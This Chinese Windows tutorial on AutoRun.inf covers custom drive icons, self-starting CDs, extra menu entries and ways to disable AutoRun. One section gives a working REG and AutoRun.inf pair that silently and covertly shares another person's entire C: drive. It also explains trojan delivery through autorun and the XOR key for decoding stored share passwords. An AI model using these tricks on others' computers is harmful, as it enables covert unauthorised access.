有很多光盘放入光驱就会自动运行,它们是怎么做到的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件;如果存在AutoRun.inf文件则执行它里面的预设程序。
比如插入一张Windows安装光盘,用不了几秒钟,你就会看到Windows欢迎屏幕,关闭这个窗口,然后按住Shift键双击“我的电脑”,系统会以“资源管理器”方式打开“我的电脑”,在左侧一栏双击“光驱”,打开光盘,在右侧会看到光盘中的内容。
这时就能看到光盘根目录下面的那个AutoRun.inf文件了。右击它并选择“打开方式”,在弹出的窗口中选择“记事本”打开该文件,你会看到如下所示的内容(括号中是注释):
[AutoRun](通知系统这是一个标准的AutoRun文件,需要执行下面的命令。)
OPEN=SAPLE\AUTORUN\AUTORUN.EXE(通知系统打开光盘文件夹“SAMPLE\AUTORUN”里面的“AUTORUN.EXE”文件)
ICON=SAMPLE\AUTORUN\WINXPCD.ICO(用“SAMPLE\AUTORUN”文件夹里面的“WINXPCD.ICO”图标为光盘驱动器图标)。
小提示:是否执行AutoRun功能其实由注册表来决定。在“开始”菜单的“运行”中输入Regedit,打开注册表编辑器,展开到HKEY_CURRENT_USER\ Software\Microsoft\Windows\Current- Version\Policies\Exploer主键下,右边窗口中的二进制值“NoDriveType- AutoRun”决定了是否执行AutoRun功能(包括硬盘和Ramdisk)。“NoDriveTypeAutoRun”默认键值为95 00 00 00。
共享另一台电脑的硬盘
如果你希望共享另外一台电脑的所有驱动器,可以利用我们刚刚提到的AutoRun.inf文件,前提是另外一台电脑已经打开139共享。首先编写一个REG文件,打开记事本,键入以下内容:
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Network\Lanman\C$]
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
将以上部分另存为ShareC.reg文件备用。要特别注意第一行REGEDIT4要用大写且顶格写,在它后面要空上一行,在最后一行写完后记得要按两次回车键,即最后也要空上一行。
然后编制一个AutoRun.inf文件,键入以下内容:
[AutoRun]
Open=Regedit/s ShareC.reg
加/s参数是为了导入时不会显示任何提示信息,保存AutoRun.inf文件。将ShareC.reg和AutoRun.inf这两个文件都复制到另一台电脑的D盘的根目录下,这样对方只要双击D盘就会将ShareC.reg导入注册表,在另一台电脑重启后C盘就会完全共享,要共享其他任何一个硬盘,方法都相同。
当心主动中木马
一些别有用心的人,会在AutoRun.inf文件中,把“Open=ShareC.Reg”改成“Open=木马服务端文件名”,然后把AutoRun.inf和配置好的木马服务端一起复制到你的D盘的根目录下,这样不需你运行木马服务端程序,而只要你双击了D盘就会使木马运行。这样做的好处显而易见,那就是大大的增加了木马运行的主动性,即使你非常警惕,不熟悉的文件轻易不会运行,也很难防范这种方法。那么要如何防范他人利用AutoRun.inf文件对你进行攻击呢?
共享分类完全是由flags标志决定的,它的键值决定了共享目录的类型。当flags=0x302时,重新启动系统,目录共享标志消失,表面上看没有共享,实际上该目录正处于完全共享状态。网上流行的共享蠕虫,就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402,就可以看到硬盘被共享了。
以上代码中的Parmlenc、Parm2enc属性项是加密的密码,系统在加密时采用了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算,要想求出密码再进行一次异或运算,然后查ASCII表可得出目录密码。
解决办法是把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“C$”、“D$”、“E$”等删掉;然后删除windows\system\下面的Vserver.vxd,它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序;再把HKEY_LOCAL_MACHINE\System\CurrentCo-ntrolSet\Services\VxD\下的Vserver键值删掉,就会很安全了。
事实上,大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序,因此我们完全可以将硬盘的AutoRun功能关闭,这样即使在硬盘根目录下有AutoRun.inf这个文件,Windows也不会去运行其中指定的程序,从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。
除此以外,我们还应让Windows能显示出隐藏的共享。大家都知道,在Windows 9X中设置共享时,通过在共享名后加上“$”这个符号,可使共享隐藏。比如,我们给一个名为share的计算机的C盘设置共享时,只要将其共享名设为C$,就看不到被共享的C盘,只有通过输入该共享的确切路径,才能访问此共享。不过我们只要将电脑中的msnp32.dll文件稍做修改,就可以让Windows显示出隐藏的共享。
由于在Windows下msnp32.dll会被调用,不能直接修改此文件,所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32,msnp32.dll在C:\Windows\system文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32,找到“24 56 E8 17”(位于偏移地址00003190~000031A0处),找到后将“24”改为“00”,然后保存,关闭UltraEdit。重启计算机进入DOS模式,在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll,重启进入Windows,现在双击share就能看见被隐藏的共享了。
最后要提醒大家利用TCP/IP协议设计的NethackerⅡ等黑客软件可以穿过Internet网络,找到共享的主机,然后进行相应操作。所以当您通过Modem上网时,千万要小心,因为一不小心,您的主机将完全共享给对方。防范这类事情发生的方法无非是经常检查系统,给系统打上补丁,经常使用反黑杀毒软件,上网时打开防火墙,注意异常现象,留意AutoRun.inf文件的内容,关闭共享或不要设置为完全共享,且加上复杂的共享密码。
改变驱动器图标
灵活应用AutoRun,有时可以给电脑带来不少乐趣。比如,可以使用AutoRun来为某个驱动器指定漂亮的图标。具体步骤如下:
步骤1:打开记事本,新建一个文件,在里面输入如下内容:
[AutoRun]
ICON=C:\Windows\System\Shell32.DLL,21
说明:Shell32.DLL是一个Windows系统文件,里面包含有很多Windows的系统图标,21表示显示为编号为21的图标,当然你也可以自己制作一个图标,只需要在“ICON”一行把路径做相应修改即可。除了可以使用DLL文件中的图标外,还能用EXE文件中的图标,或直接使用ICO文件。
步骤2:将该文件存储到需要更改图标的磁盘的根目录下面,命名为AutoRun.inf。
步骤3:闭记事本,在“我的电脑”里面按F5键刷新一下,就会看到驱动器被改变了图标,
制作自运行个性CD
如果你经常刻录光盘,那么利用AutoRun可以轻松地制作一张自启动光盘,指定光盘自动运行光盘上的某个程序,只需要在某个文件夹下新建一个autorun.inf文件,里面的内容为:
[AutoRun]
OPEN=MyRun.BAT
ICON=Mylcon.ICO
其中MyRun.BAT、Mylcon.ICO分别是指定的需要自动运行的程序和图标文件。最后把Autorun.inf、MyRun.BAT和Mylcon.ICO三个文件拖放到CD-R的根目录中一并刻录,刻出来的光盘被插入光驱后可以自动启动根目录下MyRun.BAT文件。而且在Windows“资源管理器”中显示的是Mylcon.ICO图标的样子。
小提示:如果你将AutoRun.inf中的内容改为:
[AutoRun]
open=explorer.exe/n/e
那么这张光盘运行后会自动打开一个以“我的电脑”为主目录的“资源管理器”窗口。
如果改为:
[AutoRun]
open=start.exe yourfilenme.html
那么该光盘运行后自动运行光盘中的yourname.html网页文件。
打造一张会唱歌的MP3光盘
步骤1:首先在硬盘创建一个名为MP3的文件夹,比如:D:\MP3,接着将系统中Winamp安装文件夹中的所有文件复制到这个D:\MP3中,然后再复制要刻录到光盘上的MP3文件到该文件夹。
步骤2:双击运行D:\MP3中的Winamp.exe运行Winamp,单击其主界面下方的“添加”按钮,并选择“目”子按钮,在打开的“打开乐曲目录”对话框中选择D:\MP3文件夹,同时选中“包括子目录”复选框,退出Winamp。
步骤3:启动“资源管理器”并进入D:\MP3,可以看到一个名为Winamp.m3u的文件,用“记事本”打开它,按下Ctrl+H调出“替换”对话框。在“查找内容”框中输入:D:\MP3,在“替换为”中不填入任何字符,按下“全部替换”按钮,这样Winamp.m3u文件中所有D:\MP3字符串都被去掉了。
步骤4:接着在D:\MP3文件夹中新建一个AutoRun.inf文件,在其中输入:
[AutoRun]
open=winamp.exe winamp.m3u
步骤5:将D:\MP3中所有文件刻录到光盘上,以后只要把这张光盘插入光驱,其中的Winamp就会自动启动并播放光盘中的MP3歌曲。
增强驱动器右键菜单
其实AutoRun.inf不仅可以改变磁盘图标,还能为磁盘右键增加很多命令,只需要在文件里加入如下语句即可。
shell\序号=菜单内容
shell\序号\command=要执行的命令和参数
举个例子吧:
[AutoRun]
ICON=C:\Windows\System\Shell32.DLL,21
shell\01=光盘说明
shell\01\command=notepad readme.txt
shell\02=软件安装
shell\02\command=autorun
shell\03=插件安装
shell\03\command=Plug\setup
小提示:readme.txt必须在光盘的根目录下面,notepad是Windows自带的“记事本”程序。要执行的文件是可执行文件的话只需要写上文件名即可,如02后面的AutoRun就是run.exe;而在文件夹里面的需要加上路径,如03的setup.exe就放在光盘根目录下的plug子目录中。最后效果如图2所示,有了它,可以让用户更加灵活的复制光盘,很多游戏光盘就采用了这种技术。
|
|
AutoRun功能虽然很方便,但有时也会打断我们正在进行的任务,或导致光驱的种种故障,甚至于成为黑客的帮凶,所以有些朋友采取了禁止AutoRun功能的办法。但全面禁止AutoRun功能绝非大家的原意,因此我们可以有选择的禁止该功能,让大家能按照自己的需要进行选择。举个例子,我们可以只禁止CDROM的自动运行功能,或者是只禁止硬盘的自动运行功能,甚至于只禁止程序光盘或只禁止音乐CD的自动运行功能,方法如下:
只禁止硬盘的自动运行
在“开始”菜单的“运行”中输入Regedit,打开注册表编辑器,展开到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer主键下,右边窗口中的二进制值“NoDriveTypeAutoRun”决定了是否执行AutoRun功能,将“NoDriveTypeAutoRun”的默认键值由95, 00,00,00,改为9D,00,00,00,然后关闭注册表编辑器,重启电脑即可。
关闭硬盘AutoRun有个好处,那就是可以防范对方用AutoRun.inf共享你的硬盘或让你中木马。
如果想临时禁止硬盘的自动运行功能,可以在进入硬盘前,右击硬盘图标,在弹出菜单中选择“打开”,这样进入硬盘就不会执行AutoRun.inf文件中自动运行的程序了。
只禁止光盘的自动运行
临时禁止光盘的自动运行功能可以在光盘插入时,按住Shift键。如果要永久禁止,可以将“NoDriveTypeAutoRun”的键值改为B5,00,00,00,就会关闭光盘的Autorun功能。
只禁止程序光盘的自动运行
如果只希望禁止程序光盘的自动运行功能,而不想禁止音乐CD的自动播放,可以将“NoDriveTypeAutoRun”的键值改为BD,00,00,00,这样就可以关闭程序光盘的Autorun功能。
只禁止音乐CD的自动运行
如果只希望禁止音乐CD的自动播放,而不想禁止程序光盘,可以打开“资源管理器”窗口,单击“查看”“文件夹选项”窗口(Win2000/XP中点击“工具”“文件夹选项”),在打开的“文件夹选项”窗口,单击“文件类型”标签,找到CD Audio Track文件类型选中它,然后单击“编辑”按钮,在打开的窗口里面,找到“Play”,选择“删除”即可禁止音乐CD的自动运行。
永久禁止光盘的自动运行
对于使用Windows9x的用户,单击“开始”“设置”“控制面板”“系统”,在“设备管理器”窗口双击“光驱”展开所有光驱设备(如果你有多个光驱或光驱虚拟设备),双击想更改的光驱项打开“光驱属性”窗口,单击“设置”选项卡,将“自动插入警告”选项前面的复选取消(如图3),确定后重启电脑即禁止了自动运行功能,除非你重新勾选“自动插入警告”复选框。
对于使用Windows 2000/XP的用户,在“设备管理器”中打开DVD/CDROM属性后,并不能找到“自动插入通告”选项。其实,通过修改注册表就能取消光驱的自动运行,打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon- trolSet\Services\Cdrom子键,把Autorun的键值由1更改为0即可。
|
|
(出处:http://down.vipcn.com/)
|
精品推荐
